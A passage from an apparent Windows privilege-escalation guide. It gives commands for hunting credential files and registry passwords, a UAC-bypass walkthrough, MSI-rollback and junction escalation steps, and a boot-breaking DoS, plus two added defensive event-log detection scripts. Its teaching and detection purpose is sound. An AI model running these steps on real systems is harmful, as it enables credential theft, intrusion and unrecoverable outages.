dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
Credentials in the RecycleBin
You should also check the Bin to look for credentials inside it.
To recover passwords saved by several programs you can use: http://www.nirsoft.net/password_recovery_tools.html
Inside the registry
Other possible registry keys with credentials
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
Extract openssh keys from registry.
Browsers History
You should check for dbs where passwords from Chrome or Firefox are stored.
Also check the history, bookmarks and favourites of the browsers, since some passwords could be stored there.
Tools to extract passwords from browsers:
- Mimikatz: dpapi::chrome
- SharpWeb
- SharpChromium
- SharpDPAPI
COM DLL Overwriting
The Component Object Model (COM) is a technology built within the Windows operating system that allows intercommunication between software components of different languages. Each COM component is identified via a class ID (CLSID) and each component exposes functionality via one or more interfaces, identified via interface IDs (IIDs).
COM classes and interfaces are defined in the registry under HKEY_CLASSES_ROOT\CLSID and HKEY_CLASSES_ROOT\Interface respectively. This registry is created by merging HKEY_LOCAL_MACHINE\Software\Classes and HKEY_CURRENT_USER\Software\Classes (= HKEY_CLASSES_ROOT).
Inside the CLSIDs of this registry you can find the child registry InProcServer32 which contains a default value pointing to a DLL and a value called ThreadingModel that can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).
Basically, if you can overwrite any of the DLLs that are going to be executed, you could escalate privileges if that DLL is going to be executed by a different user.
To learn how attackers use COM Hijacking as a persistence mechanism check:
Generic Password search in files and registry
Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Search for a file with a certain filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Search the registry for key names and passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d
Tools that search for passwords
MSF-Credentials Plugin is a msf plugin. I have created this plugin to automatically execute every metasploit POST module that searches for credentials inside the victim.
Winpeas automatically searches for all the files containing passwords mentioned in this page.
Lazagne is another great tool for extracting passwords from a system.
The tool SessionGopher searches for sessions, usernames and passwords of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP).
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
Leaked Handlers
Imagine that a process running as SYSTEM opens a new process (OpenProcess()) with full access. The same process also creates a new process (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Then, if you have full access to the low privileged process, you can grab the open handle to the privileged process created with OpenProcess() and inject a shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).
Named Pipe Client Impersonation
Shared memory segments, referred to as pipes, enable process communication and data transfer.
Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as named pipe server and named pipe client.
When data is sent through a pipe by a client, the server that set up the pipe has the ability to take on the identity of the client, assuming it has the necessary SeImpersonate rights. Identifying a privileged process that communicates via a pipe which you can mimic provides an opportunity to gain higher privileges by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found here and here.
Also the following tool allows to intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows to list and see all the pipes to find privescs: https://github.com/cyberark/PipeViewer
Telephony tapsrv remote DWORD write to RCE
The Telephony service (TapiSrv) in server mode exposes \pipe\tapsrv (MS-TRP). A remote authenticated client can abuse the mailslot-based async event path to turn ClientAttach into an arbitrary 4-byte write to any existing file writable by NETWORK SERVICE, then gain Telephony admin rights and load an arbitrary DLL as the service. Full flow:
- ClientAttach with pszDomainUser set to a writable existing path: the service opens it via CreateFileW(..., OPEN_EXISTING) and uses it for async event writes.
- Each event writes the attacker-controlled InitContext from Initialize to that handle. Register a line app with LRegisterRequestRecipient (Req_Func 61), trigger TRequestMakeCall (Req_Func 121), fetch via GetAsyncEvents (Req_Func 0), then unregister/shutdown to repeat deterministic writes.
- Add yourself to [TapiAdministrators] in C:\Windows\TAPI\tsec.ini, reconnect, then call GetUIDllName with an arbitrary DLL path to execute TSPI_providerUIIdentify as NETWORK SERVICE.
More details:
Telephony Tapsrv Arbitrary Dword Write To Rce
Misc
File Extensions that could execute stuff in Windows
Check this page: https://filesec.io/
Monitoring Command Lines for passwords
When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.
while($true)
{
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
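The same observation serves the defender: command lines that carry credentials are recorded in Security event 4688 when process command-line auditing is enabled, so they can be found after the fact rather than by polling. The following added example (not HackTricks' own code; Get-ProcessCreationFindings, Test-CommandLineForCredentials and the two sample events are constructed) runs a set of credential-on-command-line patterns over rendered 4688 events and redacts the matched part of each finding:

```powershell
# Added example, not HackTricks' own code. Function names and the sample events are constructed.
# Assumes the "Include command line in process creation events" policy is on; without it the
# CommandLine field of event 4688 is empty and nothing can be matched.
$credentialPatterns = @(
    '(?i)\bnet\s+use\b.*\s/user:',                                   # net use \\srv\share <pw> /user:dom\user
    '(?i)\bnet\s+user\s+\S+\s+[^/*\s]\S*',                            # net user <name> <pw> [/add]  ("*" prompts instead)
    '(?i)\bschtasks\b.*\s/rp\s+\S+',                                  # schtasks ... /ru <user> /rp <pw>
    '(?i)\bpsexec\b.*\s-p\s+\S+',                                     # psexec -u <user> -p <pw>
    '(?i)(?:^|\s)(?:--password|-pw|/p(?:ass(?:word)?)?)[ :=]\S+',    # common password switches
    '(?i)\bpassword\s*=\s*\S+'                                        # key=value forms, e.g. connection strings
)

function Test-CommandLineForCredentials {
    param([string]$CommandLine)
    foreach ($pattern in $credentialPatterns) {
        if ($CommandLine -match $pattern) { return $pattern }
    }
    return $null
}

function Get-ProcessCreationFindings {
    param([string[]]$EventXml)   # 4688 events rendered with $event.ToXml()
    foreach ($raw in $EventXml) {
        [xml]$e = $raw
        $data = @{}
        foreach ($d in $e.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $cmd = [string]$data['CommandLine']
        $hit = Test-CommandLineForCredentials -CommandLine $cmd
        if (-not $hit) { continue }
        [pscustomobject]@{
            Time        = $e.Event.System.TimeCreated.SystemTime
            Computer    = $e.Event.System.Computer
            Subject     = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            Process     = $data['NewProcessName']
            Parent      = $data['ParentProcessName']
            Pattern     = $hit
            # Replace the matched span so the finding can be shared without re-exposing the secret.
            CommandLine = [regex]::Replace($cmd, $hit, '[REDACTED]')
        }
    }
}

# Two constructed 4688 events: one that passes a password to net use, one benign.
$sampleEvents = @(
@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4688</EventID><TimeCreated SystemTime="2024-01-01T10:00:00.000Z"/><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">alice</Data><Data Name="SubjectDomainName">CORP</Data>
    <Data Name="NewProcessName">C:\Windows\System32\net.exe</Data>
    <Data Name="CommandLine">net use Z: \\fs01\share Summer2024! /user:CORP\svc_backup</Data>
    <Data Name="ParentProcessName">C:\Windows\System32\cmd.exe</Data>
  </EventData>
</Event>
'@,
@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4688</EventID><TimeCreated SystemTime="2024-01-01T10:00:05.000Z"/><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">alice</Data><Data Name="SubjectDomainName">CORP</Data>
    <Data Name="NewProcessName">C:\Windows\System32\notepad.exe</Data>
    <Data Name="CommandLine">"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt</Data>
    <Data Name="ParentProcessName">C:\Windows\explorer.exe</Data>
  </EventData>
</Event>
'@
)
Get-ProcessCreationFindings -EventXml $sampleEvents | Format-List

# Live use, reading the Security log (requires rights to read it):
# Get-ProcessCreationFindings -EventXml (Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} -MaxEvents 1000 | ForEach-Object { $_.ToXml() })
```

Only the net use event is reported, with the password segment replaced by [REDACTED]. The patterns are deliberately broad (a bare -p can be a port as well as a password), so treat hits as review candidates; the durable fix is to move the scheduled task or script to a managed service account or a credential store so nothing has to be passed on the command line.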
Stealing passwords from processes
From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass
If you have access to the graphical interface (via console or RDP) and UAC is enabled, in some versions of Microsoft Windows it's possible to run a terminal or any other process such as "NT\AUTHORITY SYSTEM" from an unprivileged user.
This makes it possible to escalate privileges and bypass UAC at the same time with the same vulnerability. Additionally, there is no need to install anything and the binary used during the process is signed and issued by Microsoft.
Some of the affected systems are the following:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
To exploit this vulnerability, it's necessary to perform the following steps:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
You have all the necessary files and information in the following GitHub repository:
https://github.com/jas502n/CVE-2019-1388
From Administrator Medium to High Integrity Level / UAC Bypass
Read this to learn about Integrity Levels:
Then read this to learn about UAC and UAC bypasses:
From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP
The technique is explained in this blog post and the exploit code is available here.
The attack basically consists of abusing the Windows Installer rollback feature to replace legitimate files with malicious ones during the uninstallation process. For this the attacker needs to create a malicious MSI installer that will be used to hijack the C:\Config.Msi folder, which will later be used by Windows Installer to store rollback files during the uninstallation of other MSI packages, where the rollback files would have been modified to contain the malicious payload.
The technique is summarized as follows:
- Stage 1: Prepare the Hijack (leave C:\Config.Msi empty)
  - Step 1: Install the MSI
    - Create an .msi that installs a harmless file (e.g., dummy.txt) into a writable folder (TARGETDIR).
    - Mark the installer as "UAC Compliant", so a non-admin user can run it.
    - Keep a handle open to the file after install.
  - Step 2: Begin Uninstall
    - Uninstall the same .msi.
    - The uninstall process starts moving files to C:\Config.Msi and renaming them to .rbf files (rollback backups).
    - Poll the open file handle using GetFinalPathNameByHandle to detect when the file becomes C:\Config.Msi\<random>.rbf.
  - Step 3: Custom Syncing
    - The .msi includes a custom uninstall action (SyncOnRbfWritten) that:
      - Signals when the .rbf has been written.
      - Then waits on another event before continuing the uninstall.
  - Step 4: Block Deletion of .rbf
    - When signaled, open the .rbf file without FILE_SHARE_DELETE; this prevents it from being deleted.
    - Then signal back so the uninstall can finish.
    - Windows Installer fails to delete the .rbf, and because it can't delete all contents, C:\Config.Msi is not removed.
  - Step 5: Manually Delete .rbf
    - You (the attacker) delete the .rbf file manually.
    - Now C:\Config.Msi is empty, ready to be hijacked.
  - At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete C:\Config.Msi.
- Stage 2: Replacing Rollback Scripts with Malicious Ones
  - Step 6: Recreate C:\Config.Msi with Weak ACLs
    - Recreate the C:\Config.Msi folder yourself.
    - Set weak DACLs (e.g., Everyone:F), and keep a handle open with WRITE_DAC.
  - Step 7: Run Another Install
    - Install the .msi again, with:
      - TARGETDIR: a writable location.
      - ERROROUT: a variable that triggers a forced failure.
    - This install will be used to trigger rollback again, which reads .rbs and .rbf.
  - Step 8: Monitor for .rbs
    - Use ReadDirectoryChangesW to monitor C:\Config.Msi until a new .rbs appears.
    - Capture its filename.
  - Step 9: Sync Before Rollback
    - The .msi contains a custom install action (SyncBeforeRollback) that:
      - Signals an event when the .rbs is created.
      - Then waits before continuing.
  - Step 10: Reapply Weak ACL
    - After receiving the ".rbs created" event:
      - Windows Installer reapplies strong ACLs to C:\Config.Msi.
      - But since you still have a handle with WRITE_DAC, you can reapply weak ACLs again.
    - ACLs are enforced only on handle open, so you can still write to the folder.
  - Step 11: Drop Fake .rbs and .rbf
    - Overwrite the .rbs file with a fake rollback script that tells Windows to:
      - Restore your .rbf file (the malicious DLL) into a privileged location (e.g., C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).
    - Drop your fake .rbf containing a malicious SYSTEM-level payload DLL.
  - Step 12: Trigger the Rollback
    - Signal the sync event so the installer resumes.
    - A type 19 custom action (ErrorOut) is configured to intentionally fail the install at a known point.
    - This causes rollback to begin.
  - Step 13: SYSTEM Installs Your DLL
    - Windows Installer reads your malicious .rbs,
    - and copies your .rbf DLL into the target location.
    - This drops your malicious DLL into a SYSTEM-loaded path.
  - Final Step: Execute SYSTEM Code
    - Run a trusted auto-elevated binary (e.g., osk.exe) that loads the hijacked DLL.
    - Boom: your code is executed as SYSTEM.
From Arbitrary File Delete/Move/Rename to SYSTEM EoP
The main MSI rollback technique (the one above) assumes you can delete a whole folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion?
You could exploit NTFS internals: every folder has a hidden alternate data stream called:
C:\SomeFolder::$INDEX_ALLOCATION
This stream stores the index metadata of the folder.
So if you delete the ::$INDEX_ALLOCATION stream of a folder, NTFS removes the entire folder from the file system.
You can do this using standard file deletion APIs like:
DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");
Even though you're calling a file delete API, it deletes the folder itself.
From Folder Contents Delete to SYSTEM EoP
What if your primitive doesn't allow you to delete arbitrary files/folders, but it does allow deletion of the contents of an attacker-controlled folder?
- Step 1: Setup bait folder and file
  - Create: C:\temp\folder1
  - Inside it: C:\temp\folder1\file1.txt
- Step 2: Place an oplock on file1.txt
  - The oplock pauses execution when a privileged process tries to delete file1.txt.
// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();
- Step 3: Trigger SYSTEM process (e.g., SilentCleanup)
  - This process scans folders (e.g., %TEMP%) and tries to delete their contents.
  - When it reaches file1.txt, the oplock triggers and hands control to your callback.
- Step 4: Inside the oplock callback: redirect the deletion
  - Option A: Move file1.txt elsewhere
    - This empties folder1 without breaking the oplock.
    - Don't delete file1.txt directly: that would release the oplock prematurely.
  - Option B: Convert folder1 into a junction:
# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control
  - Option C: Create a symlink in \RPC Control:
# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")
  - This targets the NTFS internal stream that stores folder metadata: deleting it deletes the folder.
- Step 5: Release the oplock
  - The SYSTEM process continues and tries to delete file1.txt.
  - But now, due to the junction + symlink, it's actually deleting: C:\Config.Msi::$INDEX_ALLOCATION
Result: C:\Config.Msi is deleted by SYSTEM.
From Arbitrary Folder Create to Permanent DoS
Exploit a primitive that lets you create an arbitrary folder as SYSTEM/admin, even if you can't write files or set weak permissions.
Create a folder (not a file) with the name of a critical Windows driver, e.g.:
C:\Windows\System32\cng.sys
- This path normally corresponds to the cng.sys kernel-mode driver.
- If you pre-create it as a folder, Windows fails to load the actual driver at boot.
- Then, Windows tries to load cng.sys during boot.
- It sees the folder, fails to resolve the actual driver, and crashes or halts boot.
- There's no fallback, and no recovery without external intervention (e.g., boot repair or disk access).
From High Integrity to System
New service
If you are already running in a High Integrity process, the path to SYSTEM can be as easy as creating and executing a new service:
sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename
Tip
When creating a service binary make sure it is a valid service or that the binary performs the necessary actions quickly, as it will be killed after 20 seconds if it is not a valid service.
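Every service created this way is recorded by the Service Control Manager as System event 7045, which is the first place to look for this step on a suspected host. The following added example (not HackTricks' own code; Get-ServiceInstallReview, Get-ServiceExecutable and the two sample events are constructed, the first reproducing the sc create command above) reviews such events and flags the properties that distinguish a hand-made service from a normal software install:

```powershell
# Added example, not HackTricks' own code. Function names and the sample events are constructed.
# Field names (ServiceName, ImagePath, ServiceType, StartType, AccountName) are the 7045 EventData
# names; the Security/@UserID attribute is the SID of the account that installed the service.
$trustedImageRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") |
    Where-Object { $_.Length -gt 1 }   # drop the empty ProgramFiles(x86) entry on 32-bit hosts

function Get-ServiceExecutable {
    param([string]$ImagePath)
    # ImagePath may be quoted, carry arguments or be a "svchost.exe -k <group>" line; keep the executable only.
    $p = $ImagePath.Trim()
    if ($p.StartsWith('"')) { $exe = ($p -split '"')[1] } else { $exe = ($p -split '\s+')[0] }
    return [System.Environment]::ExpandEnvironmentVariables($exe)
}

function Get-ServiceInstallReview {
    param([string[]]$EventXml)   # 7045 events rendered with $event.ToXml()
    foreach ($raw in $EventXml) {
        [xml]$e = $raw
        $data = @{}
        foreach ($d in $e.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $exe = Get-ServiceExecutable -ImagePath ([string]$data['ImagePath'])
        $installer = [string]$e.Event.System.Security.UserID
        $flags = @()
        $inTrustedRoot = $false
        foreach ($root in $trustedImageRoots) {
            if ($exe.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { $inTrustedRoot = $true }
        }
        if (-not $inTrustedRoot) { $flags += 'image outside Windows/Program Files' }
        if ($exe -match '(?i)\\(Temp|Downloads|Public|AppData|ProgramData)\\') { $flags += 'user-writable path' }
        if ($data['ImagePath'] -match '(?i)(cmd\.exe|powershell|rundll32|mshta|regsvr32|wscript|cscript)') { $flags += 'script or LOLBin host' }
        # Software installers run as SYSTEM (S-1-5-18); an interactive "sc create" is attributed to the user's SID.
        if ($installer -and $installer -ne 'S-1-5-18') { $flags += "installed by non-SYSTEM account $installer" }
        $summary = if ($flags) { $flags -join '; ' } else { 'none (still review if unexpected)' }
        [pscustomobject]@{
            Time      = $e.Event.System.TimeCreated.SystemTime
            Computer  = $e.Event.System.Computer
            Service   = $data['ServiceName']
            Image     = $exe
            Account   = $data['AccountName']
            StartType = $data['StartType']
            Flags     = $summary
        }
    }
}

# Two constructed 7045 events: the sc create above, and a binary dropped in a world-writable folder.
$sampleEvents = @(
@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Service Control Manager"/><EventID>7045</EventID>
    <TimeCreated SystemTime="2024-01-01T10:00:00.000Z"/><Computer>WS01</Computer>
    <Security UserID="S-1-5-21-1111111111-2222222222-3333333333-1001"/></System>
  <EventData>
    <Data Name="ServiceName">newservicename</Data>
    <Data Name="ImagePath">C:\windows\system32\notepad.exe</Data>
    <Data Name="ServiceType">user mode service</Data>
    <Data Name="StartType">demand start</Data>
    <Data Name="AccountName">LocalSystem</Data>
  </EventData>
</Event>
'@,
@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Service Control Manager"/><EventID>7045</EventID>
    <TimeCreated SystemTime="2024-01-01T10:05:00.000Z"/><Computer>WS01</Computer>
    <Security UserID="S-1-5-18"/></System>
  <EventData>
    <Data Name="ServiceName">UpdaterSvc</Data>
    <Data Name="ImagePath">"C:\Users\Public\Downloads\updater.exe" -install</Data>
    <Data Name="ServiceType">user mode service</Data>
    <Data Name="StartType">auto start</Data>
    <Data Name="AccountName">LocalSystem</Data>
  </EventData>
</Event>
'@
)
Get-ServiceInstallReview -EventXml $sampleEvents | Format-List

# Live use (System log):
# Get-ServiceInstallReview -EventXml (Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='Service Control Manager'; Id=7045} -MaxEvents 50 | ForEach-Object { $_.ToXml() })
```

The first sample is flagged only because an interactive account installed it, which is exactly why the installer SID is worth keeping in the review: the notepad image path alone looks legitimate. The second is flagged for its location and for landing in a world-writable folder.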
AlwaysInstallElevated
From a High Integrity process you could try to enable the AlwaysInstallElevated registry entries and install a reverse shell using a .msi wrapper.
More information about the registry keys involved and how to install a .msi package here.
High + SeImpersonate privilege to System
You can find the code here.
From SeDebug + SeImpersonate to Full Token privileges
If you have those token privileges (you will probably find them in a process that is already High Integrity), you can open almost any process (except protected processes) with the SeDebug privilege, copy that process's token, and create an arbitrary process with it.
This technique usually picks a process running as SYSTEM that has all the token privileges (yes, there are SYSTEM processes that do not have all the token privileges).
You can find an example of code executing the proposed technique here.
Named Pipes
This technique is what meterpreter uses for getsystem. It consists of creating a pipe and then creating (or abusing) a service that writes to that pipe. The server that created the pipe, using the SeImpersonate privilege, can then impersonate the token of the pipe client (the service) and obtain SYSTEM privileges.
If you want to learn more about named pipes you should read this.
If you want to read an example of how to go from High Integrity to SYSTEM using named pipes you should read this.
Dll Hijacking
If you can hijack a DLL loaded by a process running as SYSTEM, you can execute arbitrary code with that process's permissions. DLL hijacking is therefore useful for privilege escalation, and it is far easier to achieve from a High Integrity process, which has write permissions on the folders DLLs are loaded from.
You can learn more about Dll hijacking here.
From Administrator or Network Service to System
- https://github.com/sailay1996/RpcSsImpersonator
- https://decoder.cloud/2020/05/04/from-network-service-to-system/
- https://github.com/decoder-it/NetworkServiceExploit
From LOCAL SERVICE or NETWORK SERVICE to full privs
Read: https://github.com/itm4n/FullPowers
More help
Useful tools
Best tool to look for Windows local privilege escalation vectors: WinPEAS
PS
PrivescCheck
PowerSploit-Privesc (PowerUP) -- checks for misconfigurations and sensitive files (check here). Detected.
JAWS -- checks several possible misconfigurations and gathers information (check here).
privesc -- checks for misconfigurations
SessionGopher -- extracts saved session information for PuTTY, WinSCP, SuperPuTTY, FileZilla and RDP. Use -Thorough locally.
Invoke-WCMDump -- extracts credentials from Credential Manager. Detected.
DomainPasswordSpray -- sprays gathered passwords across the domain
Inveigh -- PowerShell-based ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.
WindowsEnum -- basic Windows privesc enumeration
Sherlock ~~~~ -- searches for known privesc vulnerabilities (deprecated in favour of Watson)
WINspect -- local checks (requires admin rights)
Exe
Watson -- searches for known privesc vulnerabilities (needs to be compiled with Visual Studio) (precompiled)
SeatBelt -- enumerates the host looking for misconfigurations (more an information-gathering tool than a privesc tool) (needs to be compiled) (precompiled)
LaZagne -- extracts credentials from many programs (precompiled exe on GitHub)
SharpUP -- C# port of PowerUp
Beroot ~~~~ -- checks for misconfigurations (executable on GitHub). Not recommended; it does not work well on Win10.
Windows-Privesc-Check -- checks for misconfigurations (exe built from Python). Not recommended; it does not work well on Win10.
Bat
winPEASbat -- tool created based on this post (it does not need accesschk to work, but can use it).
Local
Windows-Exploit-Suggester -- reads the output of systeminfo and recommends working exploits (local Python)
Windows Exploit Suggester Next Generation -- reads the output of systeminfo and recommends working exploits (local Python)
Meterpreter
multi/recon/local_exploit_suggestor
The project must be compiled with the correct version of .NET (see this). To check which version of .NET is installed on the victim host you can run:
C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
References
- http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft
- Check Point Research: Chasing the Silver Fox: Cat & Mouse in Kernel Shadows